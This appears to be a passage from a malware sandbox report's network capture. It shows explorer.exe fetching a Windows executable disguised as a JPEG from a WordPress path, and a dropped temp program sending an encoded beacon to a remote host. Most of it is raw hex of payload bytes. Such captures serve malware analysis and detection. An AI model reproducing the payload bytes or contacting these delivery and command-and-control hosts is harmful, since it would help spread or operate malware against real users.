2024-08-19 07:28:24 UTC	16384	IN	Data Raw: 7b 00 00 00 b9 40 00 00 00 ba 08 00 00 00 e8 b6 0e 01 00 48 89 c1 48 8b 05 13 1a 1f 00 48 89 01 48 8d 05 b1 86 1e 00 48 89 41 10 48 8b 05 de 86 1e 00 48 89 41 18 48 8b 05 db 86 1e 00 48 89 41 20 48 c7 41 08 00 00 00 00 48 b8 9b bc a9 d9 6e 2a ee 15 48 ba 25 78 12 e8 6e 2a ee 15 48 31 d0 48 8d 15 71 86 1e 00 4c 8d 05 81 86 1e 00 4c 8d 0d 87 86 1e 00 48 89 44 24 20 e8 9b 0d 01 00 90 48 83 c4 68 c3 48 83 ec 28 48 8b 05 a0 1c 1f 00 8b 08 e8 2c 37 00 00 48 83 c0 60 48 83 c4 28 c3 56 48 83 ec 40 48 89 4c 24 38 8b 15 40 a7 1d 00 8b 0d 3e a7 1d 00 89 d0 83 f0 ff 83 f2 ff 09 d0 21 c9 83 f1 ff 21 c8 83 f0 ff b9 91 f5 6a 8f 31 d2 f7 f1 2d 86 ee dd 9d 2d 30 55 a4 91 b9 6e e2 b4 f0 81 f1 e8 0c 69 6d 01 c8 ba e6 09 83 ad 81 f2 73 0c b4 d8 89 c1 21 d1 c1 e1 01 05 95 05 Data Ascii: {@HHHHHAHHAHHA HAHnH%xnH1HqLLHD$ HhH(H,7H`H(VH@HL$8@>!!j1--0Unims!
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: 4d 08 8a 55 ef 88 14 01 48 b9 39 87 7a 81 24 43 63 d5 48 ba 29 1d f0 de d8 ef 1f 12 48 31 d1 48 29 c8 48 83 c0 01 48 b9 10 9a 8a 5f fc ac 7c c7 48 01 c8 48 89 45 f8 e9 66 ff ff ff 48 8b 4d f0 48 8b 45 08 c6 04 08 40 31 c0 48 89 4d d8 48 89 45 e0 48 8b 45 d8 48 8b 4d e0 48 89 4d c8 48 89 45 d0 8b 05 a0 69 1d 00 8b 15 9e 69 1d 00 89 c1 31 d1 83 f1 ff 09 d0 21 c8 89 c1 83 f1 ff ba ef b5 34 9b 81 f2 d3 14 20 19 21 ca 41 b8 ff ff ff ff 41 81 f0 3c a1 14 82 89 c1 44 21 c1 0f af ca 89 c2 81 e2 3c a1 14 82 0d 3c a1 14 82 0f af c2 01 c8 ba 5b 69 32 54 81 f2 a4 96 cd ab 89 c1 31 d1 ba 7f 5e ab 48 81 f2 a0 40 3f 63 21 ca 41 b8 ff ff ff ff 41 81 f0 df 1e 94 2b 89 c1 44 21 c1 0f af ca 89 c2 81 e2 df 1e 94 2b 0d df 1e 94 2b 0f af c2 01 c8 89 c2 83 f2 ff 81 e2 57 ec 86 Data Ascii: MUH9z$CcH)H1H)HH_\|HHEfHMHE@1HMHEHEHMHMHEii1!4 !AA<D!<<[i2T1^H@?c!AA+D!++W
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: bf 57 4a 44 3c 81 f7 a8 b5 bb c3 89 f0 31 f8 83 f6 ff 09 f0 45 21 c9 be 77 4e 03 87 81 f6 88 b1 fc 78 41 31 f1 be c0 2f 77 7f 81 f6 3f d0 88 80 31 f0 41 83 f1 ff 44 09 c8 35 37 e4 94 8c 05 da 51 86 d0 2d 68 86 ec 7e 2d da 51 86 d0 45 31 c9 41 81 e9 b8 dd 0e f8 44 01 c8 49 89 c9 49 83 c1 30 4c 89 4c 24 30 4c 8b 49 30 49 c1 e3 04 4c 89 c9 4c 01 d9 49 c1 e2 04 4d 01 d1 4d 8b 11 4c 89 11 4d 8b 49 08 4c 89 49 08 49 b9 b9 5c 31 d7 66 f8 40 17 48 b9 46 a3 ce 28 99 07 bf e8 49 31 c9 48 89 d1 4c 31 c9 4d 89 c1 49 83 f1 ff 4c 09 c9 4c 21 c2 48 83 f2 ff 48 83 f1 ff 49 b8 5c c5 d5 3e c0 e4 0e 17 49 b9 a3 3a 2a c1 3f 1b f1 e8 4d 31 c8 4c 31 c2 48 09 d1 48 83 f9 00 0f 9c c1 88 4c 24 3f 3d ab 51 d5 47 0f 84 e9 fe ff ff 8a 44 24 3f a8 01 0f 85 05 00 00 00 e9 0a 00 00 00 Data Ascii: WJD<1E!wNxA1/w?1AD57Q-h~-QE1ADII0LL$0LI0ILLIMMLMILII\1f@HF(I1HL1MILL!HHI\>I:*?M1L1HHL$?=QGD$?
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: 15 bf ed 1c 00 41 89 c0 41 83 f0 ff 45 89 d1 45 21 c1 45 89 d3 41 83 f3 ff 41 89 c0 45 21 d8 45 0f af c1 41 89 c1 45 21 d1 44 09 d0 41 0f af c1 44 01 c0 25 1c b6 53 5c 05 f1 18 18 bd 05 4b af 24 e3 2d 83 1e 54 2b 41 b8 67 b8 2d be 41 81 f0 2c 17 09 5d 44 29 c0 48 39 d1 0f 9c c1 88 8c 24 e7 00 00 00 3d e7 c9 d8 b8 0f 83 69 ff ff ff 8a 84 24 e7 00 00 00 a8 01 0f 85 e2 00 00 00 e9 00 00 00 00 4c 8b 84 24 38 01 00 00 48 8b 94 24 e8 00 00 00 48 8b 84 24 f0 00 00 00 48 8b 00 49 89 d1 49 c1 e1 04 48 89 c1 4c 01 c9 48 8b 09 48 c1 e2 04 48 01 d0 48 83 c0 08 48 8b 10 e8 df dd ff ff 48 8b 84 24 10 01 00 00 8a 00 b1 f4 80 f1 f4 38 c8 0f 85 2f 09 00 00 48 8b 94 24 e8 00 00 00 48 b9 e1 7f af 4d a8 f7 bd 2d 48 b8 1e 80 50 b2 57 08 42 d2 48 31 c1 48 b8 0f c5 08 a1 e5 f3 Data Ascii: AAEE!EAAE!EAE!DAD%S\K$-T+Ag-A,]D)H9$=i$L$8H$H$HIIHLHHHHHH$8/H$HM-HPWBH1H
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: 89 11 3d f4 c5 54 f9 0f 83 5f 00 00 00 48 8b 45 90 48 89 45 c8 e9 00 00 00 00 48 8b 45 c8 48 89 85 80 00 00 00 48 8b 85 80 00 00 00 48 8d a5 98 00 00 00 5e 5d c3 22 84 2a ec e9 ca f5 ff ff 36 f8 4d 8f e9 47 f7 ff ff 26 16 76 ef e9 55 f9 ff ff 46 d4 cf 31 e9 5e fb ff ff cf b0 ce 2c e9 b2 fc ff ff 7e 25 be f7 e9 8a fd ff ff 8f 85 92 02 e9 f3 fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 83 ec 60 48 8d 6c 24 60 48 89 4d f8 8b 0d 54 af 1c 00 81 f1 f7 b1 43 0d 8b 15 4c af 1c 00 89 c8 09 d0 83 f0 ff 09 d1 ba 4a 05 61 a8 81 f2 b5 fa 9e 57 31 d1 09 c8 b9 38 5c b9 6a 81 f1 c7 a3 46 95 31 c8 b9 6c 5a db 49 31 d2 f7 f1 35 0d 86 fa fb b9 15 c1 28 fa 81 f1 e5 2d ac ad 31 d2 f7 f1 b9 77 45 f5 0b 81 f1 2e a5 b4 e3 39 c8 0f 83 d3 02 00 00 48 8b 55 f8 8b 05 f1 ae 1c 00 Data Ascii: =T_HEHEHEHHH^]"*6MG&vUF1^,~%ff.UH`Hl$`HMTCLJaW18\jF1lZI15(-1wE.9HU
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: f1 cb 41 d6 fc 09 c8 3d b8 4d f2 9d 0f 83 0e 00 00 00 48 83 c4 58 c3 37 0f 77 0f e9 e0 fd ff ff 31 60 78 1d e9 a9 ff ff ff 0f 1f 80 00 00 00 00 55 48 81 ec 90 00 00 00 48 8d ac 24 80 00 00 00 48 89 55 d8 48 89 4d e0 b8 20 00 00 00 e8 8e 59 1c 00 48 29 c4 48 89 e0 48 89 45 e8 48 8b 01 48 89 45 f0 48 39 d0 0f 8e c4 00 00 00 8b 05 96 71 1c 00 8b 15 94 71 1c 00 41 b8 a1 86 99 7a 41 81 f0 a0 86 99 7a 89 c1 44 01 c1 83 f0 ff 09 d0 01 c8 b9 ff ff ff ff 81 f1 91 a2 68 5a 31 d2 83 ea 01 29 d1 29 c8 35 41 6a 09 ac b9 3b 29 a5 d9 31 d2 f7 f1 b9 22 e7 cf 90 81 f1 62 49 e3 b7 39 c8 0f 84 84 08 00 00 48 8b 4d e0 8b 05 40 71 1c 00 31 d2 f7 35 3c 71 1c 00 48 8b 55 d8 2d 69 45 ff 2e 41 b8 8e 42 ba 79 41 81 f0 e6 37 45 f2 44 29 c0 2d 29 26 ce f7 2d 17 66 15 e3 05 29 26 ce Data Ascii: A=MHX7w1`xUHH$HUHM YH)HHEHHEH9qqAzAzDhZ1))5Aj;)1"bI9HM@q15<qHU-iE.AByA7ED)-)&-f)&
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: a7 81 f1 bd 8a 14 58 31 ca 89 c1 21 d1 89 c2 81 f2 4f e5 96 70 01 d0 29 c8 89 c2 83 f2 ff 81 e2 b1 d8 17 44 41 b8 5a ff 15 9e 41 81 f0 eb 27 02 da b9 bc fe f4 9b 81 f1 43 01 0b 64 41 31 c8 89 c1 44 21 c1 0f af ca 89 c2 81 e2 b1 d8 17 44 0d b1 d8 17 44 0f af c2 01 c8 89 44 24 20 4c 89 c1 4c 89 c2 e8 f2 1c ff ff 8b 44 24 20 3d 28 54 c8 de 0f 86 56 00 00 00 e9 22 00 00 00 4c 8b 44 24 30 48 8b 84 24 a8 00 00 00 48 8b 4c 24 28 48 83 c1 08 48 8b 10 48 83 c2 08 e8 4c b5 01 00 90 48 81 c4 b8 00 00 00 5f 5e c3 8e db 90 ef e9 25 f9 ff ff 66 aa 88 bf e9 f0 f9 ff ff 23 0d 95 95 e9 68 fb ff ff 79 61 8f ac e9 99 fd ff ff dc c5 14 02 e9 b7 fe ff ff 55 48 83 ec 10 48 8d 6c 24 10 48 89 55 f8 6a 10 58 e8 f4 18 1c 00 48 29 c4 48 8b 45 f8 48 89 e2 4c 8b 00 4c 89 02 48 8b 40 Data Ascii: X1!Op)DAZA'CdA1D!DDD$ LLD$ =(TV"LD$0H$HL$(HHHLH_^%f#hyaUHHl$HUjXH)HEHLLH@
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: 44 24 28 e9 00 00 00 00 48 8b 44 24 28 48 83 c4 68 c3 06 b7 51 20 e9 60 fd ff ff c6 3f 07 63 e9 9f fe ff ff 48 83 ec 38 48 89 c8 48 89 44 24 20 48 c7 01 00 00 00 00 48 c7 41 08 00 00 00 00 48 8b 02 48 89 44 24 28 48 8b 42 08 48 89 44 24 30 48 8d 54 24 28 e8 f6 b7 ff ff 48 8b 44 24 20 48 83 c4 38 c3 48 83 ec 38 48 89 4c 24 28 e8 76 bc fe ff 48 8b 4c 24 28 48 89 44 24 30 e8 9f 10 03 00 48 8b 44 24 30 80 78 60 00 0f 85 0a 00 00 00 48 8b 4c 24 28 e8 f5 12 03 00 90 48 83 c4 38 c3 48 83 ec 58 48 89 54 24 40 48 89 4c 24 48 4c 8b 01 31 c0 89 c1 48 83 e9 ff 4c 89 c0 48 29 c8 48 89 44 24 50 48 89 c1 48 83 f1 ff 48 89 c2 48 83 f2 ff 48 21 d1 4c 89 c2 48 09 d2 49 b9 79 23 21 e4 7d 37 fe cd 49 ba 86 dc de 1b 82 c8 01 32 4d 31 d1 4c 31 ca 48 09 d1 48 83 f1 ff 48 89 c2 Data Ascii: D$(HD$(HhQ `?cH8HHD$ HHAHHD$(HBHD$0HT$(HD$ H8H8HL$(vHL$(HD$0HD$0x`HL$(H8HXHT$@HL$HL1HLH)HD$PHHHHH!LHIy#!}7I2M1L1HHH
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: 3d 2d c0 33 50 c2 69 c0 4f 4f 17 cf 3d 9d c0 e3 1d 0f 86 1b 00 00 00 48 81 c4 80 00 00 00 5e c3 64 12 02 36 e9 f8 fb ff ff d7 19 5f e2 e9 1b fd ff ff 74 c1 70 98 e9 96 ff ff ff 0f 1f 44 00 00 48 83 ec 38 48 89 54 24 28 48 89 4c 24 30 8b 05 44 b8 1b 00 31 d2 f7 35 40 b8 1b 00 41 89 c0 44 89 c0 83 f0 ff 25 bd 47 b9 73 41 b9 ff ff ff ff 41 81 f1 bd 47 b9 73 45 21 c8 b9 ff ff ff ff 81 f1 06 c8 fc e5 81 e1 bd 47 b9 73 ba f3 17 3c fb 81 f2 f5 df c0 1e 44 21 ca 44 09 c0 09 d1 31 c8 2d 9a 03 ad 9d 25 40 69 0b fb 3d 8d 54 e8 be 0f 87 a8 00 00 00 48 8b 4c 24 30 8b 15 e0 b7 1b 00 23 15 de b7 1b 00 89 d0 09 c0 83 f0 ff 41 b8 84 a9 f7 7a 41 81 c8 84 a9 f7 7a 41 83 f0 ff 44 09 c0 83 f0 ff 41 b8 0b 52 62 82 41 81 f0 8f fb 95 f8 44 09 c2 83 f2 ff 83 f0 ff 83 f2 ff 21 d0 Data Ascii: =-3PiOO=H^d6_tpDH8HT$(HL$0D15@AD%GsAAGsE!Gs<D!D1-%@i=THL$0#AzAzADARbAD!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	185.149.100.242	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:28:36 UTC	179	OUT	GET /wp-content/images/pic5.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mussangroup.com
2024-08-19 07:28:36 UTC	452	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Mon, 26 Aug 2024 07:28:36 GMT content-type: image/jpeg last-modified: Fri, 16 Aug 2024 15:28:42 GMT accept-ranges: bytes content-length: 15523840 date: Mon, 19 Aug 2024 07:28:36 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-08-19 07:28:36 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 94 2b 00 00 dc ec 00 00 fe 05 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 f3 00 00 04 00 00 03 bd ed 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$+@``
2024-08-19 07:28:36 UTC	16384	IN	Data Raw: 8b 08 39 0b 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 08 48 39 0b 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 08 48 39 0b 75 0d 48 8b 48 08 48 39 4b 08 0f 94 c1 eb 02 31 c9 89 c8 c3 cc cc cc cc cc cc f3 0f 10 00 f3 0f 10 0b 0f 2e c1 0f 94 c0 0f 9b c1 21 c8 c3 cc cc cc cc cc cc cc cc cc cc cc cc f2 0f 10 00 f2 0f 10 0b 66 0f 2e c1 0f 94 c0 0f 9b c1 21 c8 c3 cc cc cc cc cc cc cc cc cc cc cc f3 0f 10 00 f3 0f 10 48 04 f3 0f 10 13 f3 0f 10 5b 04 0f 2e c2 0f 94 c0 0f 9b c1 21 c8 0f 2e cb 0f 94 c2 0f 9b c1 21 ca 21 d0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc f2 0f 10 00 f2 0f 10 48 08 f2 0f 10 13 f2 0f 10 5b 08 66 0f 2e c2 0f 94 c0 0f 9b c1 21 c8 66 Data Ascii: 9HH9HH9uHHH9K1.!f.!H[.!.!!H[f.!f
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 5c 24 46 48 89 f8 4c 89 c3 48 89 f1 bf 01 00 00 00 48 8d 35 c8 e2 b7 00 e8 03 3e 04 00 48 8b 54 24 58 4c 8b 4c 24 60 4c 8b 94 24 30 01 00 00 44 0f b6 5c 24 46 49 89 d8 48 89 c7 48 89 ce 48 8b 84 24 90 00 00 00 0f b6 4c 24 47 48 8b 9c 24 98 00 00 00 45 88 5c 38 ff e9 71 ff ff ff 4c 8d 5a 01 4d 39 d9 0f 86 08 04 00 00 4c 89 9c 24 88 00 00 00 42 0f b6 54 12 01 0f 1f 84 00 00 00 00 00 80 fa 78 0f 85 9c 00 00 00 84 c9 74 70 48 85 c0 7d 63 49 8d 50 01 48 39 d6 73 4d 48 89 f8 48 89 d3 48 89 f1 bf 01 00 00 00 48 8d 35 30 e2 b7 00 e8 6b 3d 04 00 4c 8b 4c 24 60 4c 8b 94 24 30 01 00 00 4c 8b 9c 24 88 00 00 00 48 89 da 48 89 c7 48 89 ce 48 8b 84 24 90 00 00 00 0f b6 4c 24 47 48 8b 9c 24 98 00 00 00 c6 44 3a ff 2d 49 89 c4 49 f7 dc eb 0e 4c 89 c2 49 89 c4 eb 06 4c 89 Data Ascii: \$FHLHH5>HT$XLL$`L$0D\$FIHHH$L$GH$E\8qLZM9L$BTxtpH}cIPH9sMHHHH50k=LL$`L$0L$HHHH$L$GH$D:-IILIL
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 24 80 00 00 00 48 89 d6 4c 8b 44 24 78 49 b9 ff ff ff ff ff 7f 00 00 41 84 02 41 81 e0 ff ff 0f 00 4f 8b 1c c2 4d 85 db 0f 85 b9 01 00 00 4c 89 44 24 30 4c 89 94 24 88 00 00 00 48 8d 86 a0 03 01 00 bb d0 14 01 00 b9 08 00 00 00 48 8d 3d c5 cc ef 00 e8 48 19 00 00 48 85 c0 75 1f b8 d0 14 01 00 bb 08 00 00 00 48 8d 0d aa cc ef 00 e8 6d 15 00 00 48 85 c0 0f 84 5a 01 00 00 0f b6 b4 24 d0 00 00 00 40 84 f6 0f 84 01 01 00 00 4c 8b 84 24 b8 00 00 00 4d 8b 88 f8 03 01 00 0f 1f 40 00 4d 39 88 f0 03 01 00 0f 85 a9 00 00 00 48 89 44 24 48 49 c1 e1 04 4d 85 c9 75 07 4c 8b 0d 0e 71 ef 00 4c 89 4c 24 40 4c 89 c8 bb 08 00 00 00 48 8d 0d 42 cc ef 00 e8 05 15 00 00 0f 1f 44 00 00 48 85 c0 0f 84 dc 00 00 00 48 8b b4 24 b8 00 00 00 4c 8b 86 f0 03 01 00 48 8b 9e e8 03 01 00 Data Ascii: $HLD$xIAAOMLD$0L$HH=HHuHmHZ$@L$M@M9HD$HIMuLqLL$@LHBDHH$LH
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 41 80 fc 01 77 07 42 c6 04 1f 04 eb cc 41 80 fc 05 0f 82 3b 03 00 00 44 8b 68 54 41 0f ba e5 00 73 05 4d 8b 2a eb 03 4d 89 d5 4c 89 5c 24 28 48 89 74 24 58 4c 89 6c 24 48 4c 89 54 24 50 44 0f b6 7b 08 41 f6 c7 08 74 08 45 31 ff e9 ea 00 00 00 44 88 64 24 1d 48 8b 50 48 48 8b 0a 8b 73 0c 4c 89 e8 48 89 f3 ff d1 48 8b 8c 24 c0 00 00 00 0f b6 71 08 40 f6 c6 01 74 4b 48 8b 9c 24 b8 00 00 00 8b 73 54 0f ba e6 02 73 04 31 d2 eb 40 48 89 44 24 30 48 8b 4b 30 48 8b 51 18 48 8b 0a 48 8b 44 24 48 48 89 c3 ff d1 83 f0 01 48 8b 8c 24 c0 00 00 00 48 8b 9c 24 b8 00 00 00 89 c2 48 8b 44 24 30 eb 0a 48 8b 9c 24 b8 00 00 00 31 d2 84 d2 74 15 48 c1 e8 38 3c 05 73 03 83 c0 05 0f b6 74 24 1d 83 e6 01 eb 12 0f b6 7c 24 1f 48 0f a3 f8 40 0f 92 c6 0f b6 44 24 1d 0f b6 4c 24 1f Data Ascii: AwBA;DhTAsM*ML\$(Ht$XLl$HLT$PD{AtE1Dd$HPHHsLHH$q@tKH$sTs1@HD$0HK0HQHHD$HHH$H$HD$0H$1tH8<st$\|$H@D$L$
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 49 89 db 48 c1 eb 03 49 d3 ea 48 39 de 76 16 48 89 d9 ba 01 00 00 00 48 d3 e2 48 ff ca 49 21 d2 49 89 d8 eb 39 75 05 49 89 f0 eb 32 49 c1 e9 09 49 81 f9 00 04 00 00 73 34 42 0f b6 94 0a 00 00 01 00 41 83 e0 07 4c 89 c1 48 d3 ea 49 89 f0 48 c1 e6 03 48 f7 c2 01 00 00 00 4c 0f 45 de 4c 89 db 4c 89 d1 4c 89 c7 48 83 c4 10 5d c3 4c 89 c8 b9 00 04 00 00 e8 c6 35 05 00 4c 89 c0 b9 00 20 00 00 e8 b9 35 05 00 48 89 d0 b9 40 00 00 00 e8 ac 35 05 00 90 cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 10 eb 05 e8 d1 fe ff ff 48 85 c9 75 1e 48 89 fa 48 c1 e2 03 48 29 d3 48 8d 04 f8 48 85 db 75 e3 31 c9 48 89 ce 48 83 c4 10 5d c3 48 0f bc d1 48 0f bb d1 48 8d 34 d0 48 83 c4 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: IHIH9vHHHI!I9uI2IIs4BALHIHHLELLLH]L5L 5H@5UHHHuHHH)HHu1HH]HHH4H]
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 7c 45 b8 00 48 8b 9c 24 c8 01 00 00 48 8d 0d 67 98 bf 00 bf 1f 00 00 00 e8 23 ab ff ff 48 8b 94 24 a8 00 00 00 48 89 10 83 3d a1 b5 ee 00 00 74 0c 48 8b 50 08 e8 26 f2 04 00 49 89 13 48 8d 15 54 3c c2 00 48 89 50 08 31 c0 31 c9 eb 09 48 83 c9 01 b8 01 00 00 00 48 85 c0 7e f2 48 89 8c 24 a0 00 00 00 48 8d 05 15 45 b8 00 48 8b 9c 24 c8 01 00 00 48 8d 0d ee af bf 00 bf 22 00 00 00 90 e8 bb aa ff ff 48 8b 94 24 a0 00 00 00 48 89 10 83 3d 39 b5 ee 00 00 74 0f 48 8b 50 08 0f 1f 00 e8 bb f1 04 00 49 89 13 48 8d 15 f1 3b c2 00 48 89 50 08 31 c0 31 c9 eb 09 48 83 c9 01 b8 01 00 00 00 48 85 c0 7e f2 48 89 8c 24 98 00 00 00 48 8d 05 aa 44 b8 00 48 8b 9c 24 c8 01 00 00 48 8d 0d 6b b5 bf 00 bf 23 00 00 00 e8 51 aa ff ff 48 8b 94 24 98 00 00 00 48 89 10 83 3d cf b4 ee Data Ascii: \|EH$Hg#H$H=tHP&IHT<HP11HH~H$HEH$H"H$H=9tHPIH;HP11HH~H$HDH$Hk#QH$H=
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 44 24 48 e8 18 d8 01 00 e8 d3 d1 01 00 48 8b 44 24 58 48 8b 80 48 12 00 00 48 85 c0 74 4e 48 8b 40 10 48 89 44 24 48 e8 54 d1 01 00 48 8d 05 6d 83 be 00 bb 09 00 00 00 e8 c3 d9 01 00 48 8b 44 24 48 e8 d9 d7 01 00 e8 94 d1 01 00 e8 2f d1 01 00 e8 6a d3 01 00 e8 85 d1 01 00 48 8d 05 08 be bf 00 bb 2f 00 00 00 e8 74 b7 01 00 e8 0f d1 01 00 48 8d 05 01 a1 be 00 bb 0c 00 00 00 0f 1f 00 e8 7b d9 01 00 e8 56 d1 01 00 eb c0 e8 ef d0 01 00 48 8d 05 d5 a0 be 00 bb 0c 00 00 00 0f 1f 00 e8 5b d9 01 00 e8 36 d1 01 00 e9 5e ff ff ff 8b 05 33 29 e9 00 48 89 44 24 30 8b 0d 2c 29 e9 00 48 89 4c 24 28 48 8b 15 3c 29 e9 00 48 89 54 24 48 48 8b 1d 38 29 e9 00 48 89 5c 24 40 48 8b 35 34 29 e9 00 48 89 74 24 20 48 8b 3d 30 29 e9 00 48 89 7c 24 18 e8 86 d0 01 00 48 8d 05 e2 b6 Data Ascii: D$HHD$XHHHtNH@HD$HTHmHD$H/jH/tH{VH[6^3)HD$0,)HL$(H<)HT$HH8)H\$@H54)Ht$ H=0)H\|$H
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 24 70 0f 18 08 48 8b 16 48 85 d2 74 1a 48 8b 7a 10 48 81 ff fd 00 00 00 74 0d 73 22 48 89 44 fa 18 48 ff 42 10 eb 0b 48 89 c3 48 89 f0 e8 2e 65 00 00 48 83 c4 40 5d c3 48 83 c4 40 5d c3 48 89 f8 b9 fd 00 00 00 e8 d5 75 04 00 48 89 d0 b9 40 00 00 00 e8 e8 75 04 00 4c 89 5c 24 38 48 89 5c 24 30 e8 19 91 01 00 48 8d 05 65 08 bf 00 bb 1d 00 00 00 e8 88 99 01 00 48 8b 44 24 50 0f 1f 00 e8 fb 97 01 00 48 8d 05 11 61 be 00 bb 0c 00 00 00 e8 6a 99 01 00 48 8b 44 24 30 0f 1f 44 00 00 e8 db 97 01 00 48 8d 05 d4 14 c7 00 bb 01 00 00 00 e8 4a 99 01 00 48 8b 44 24 38 0f 1f 44 00 00 e8 bb 97 01 00 48 8d 05 5f 1a be 00 bb 02 00 00 00 e8 2a 99 01 00 e8 05 91 01 00 48 8d 05 24 23 be 00 bb 04 00 00 00 48 8b 4c 24 30 48 8b 7c 24 38 e8 aa 00 00 00 48 8d 05 24 1f be 00 bb 03 Data Ascii: $pHHtHzHts"HDHBHH.eH@]H@]HuH@uL\$8H\$0HeHD$PHajHD$0DHJHD$8DH_*H$#HL$0H\|$8H$
2024-08-19 07:28:37 UTC	16384	IN	Data Raw: 0f 8a b1 00 00 00 66 0f 2e f6 0f 85 a7 00 00 00 0f 8a a1 00 00 00 f2 0f 10 48 18 66 0f 2e ce 90 77 0e f2 0f 10 48 20 66 0f 2e f1 77 03 0f 10 ce f2 0f 10 78 08 45 0f 57 c0 66 44 0f 2e c7 66 90 75 02 7b 6a f2 44 0f 10 48 10 66 45 0f 2e c1 75 02 7b 5b f2 0f 59 da f2 0f 5e df f2 0f 59 dd f2 41 0f 5e d1 0f 10 c1 f2 0f 5c ce f2 0f 59 ca f2 0f 58 d9 f2 0f 58 e3 f2 0f 11 60 28 66 0f 2e e4 75 19 7a 17 0f 10 cc f2 0f 5c e4 66 0f 2e e4 75 0a 7a 08 66 0f 2e c9 75 02 7b 16 90 f2 44 0f 11 40 28 c6 40 30 01 f2 0f 10 40 18 31 c0 c3 0f 10 c1 b8 01 00 00 00 c3 90 0f 57 c9 f2 0f 11 48 28 c6 40 31 01 f2 0f 10 40 18 31 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 ed 00 00 00 55 48 89 e5 48 83 ec 18 48 39 98 00 01 00 00 0f 87 c6 00 00 00 Data Ascii: f.Hf.wH f.wxEWfD.fu{jDHfE.u{[Y^YA^\YXX`(f.uz\f.uzf.u{D@(@0@1WH(@1@1I;fUHHH9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49760	188.114.97.3	443	8076	C:\Users\user\AppData\Local\Temp\E9D3.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:28:43 UTC	351	OUT	POST /imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 96 Host: mundoparachicas.space
2024-08-19 07:28:43 UTC	96	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
